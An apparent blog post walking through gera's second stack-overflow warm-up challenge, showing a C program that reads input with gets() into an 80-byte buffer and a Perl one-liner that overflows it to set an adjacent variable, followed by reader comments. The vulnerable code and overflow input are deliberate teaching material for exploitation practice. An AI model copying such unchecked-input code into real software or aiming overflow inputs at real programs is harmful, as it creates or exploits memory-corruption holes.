xorl %eax, %eax

Warming up on Stack No. 2

with 4 comments

This is the -let’s call it- second level of gera’s challenges. The code is similar to the previous one as you can see here at stack2-stdin.c:

/* stack2-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08xn", &buf, &cookie);
        gets(buf);

        if (cookie == 0x01020305)
                printf("you win!n");
}

Actually, the only difference from stack1-stdin.c is that this time the cookie value must be 0x01020305 to get the nice message. Of course, to do this you have to enter non-printable characters but you can use inline Perl as we did previously and print them based on their hexadecimal equivalents, so…:

sh-3.2$ perl -e 'print "X" x 80 . "\x05\x03\x02\x01" . "\n"' | ./stack2-stdin
buf: bf9cc610 cookie: bf9cc660
you win!
sh-3.2$

This was an easy one too :p

Written by xorl

January 2, 2009 at 13:52

4 Responses

Subscribe to comments with RSS.

  1. I really don’t think this is how you’re supposed to solve it. Is it? I mean, I thought the challenge was to try and figure out how to supply non-printable characters during runtime, using Perl seems like a cheat to me. Isn’t there a way to do it by just typing the input? Using the \x escape sequence doesn’t work if you do it by hand.

    Ben

    June 8, 2009 at 18:24

  2. You can do this in any programming language, not just perl. In addition, you cannot enter those characters by typing them in the terminal since they aren’t printable ASCII characters. Check out ascii(7) for details.

    xorl

    June 8, 2009 at 21:07

  3. A question,

    why did you choose this hex number x05\x03\x02\x01 ????
    thanks..

    AIHACK

    October 31, 2010 at 21:12

  4. @AHACK: I didn’t that challenge was created by gera.

    xorl

    November 1, 2010 at 13:24


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s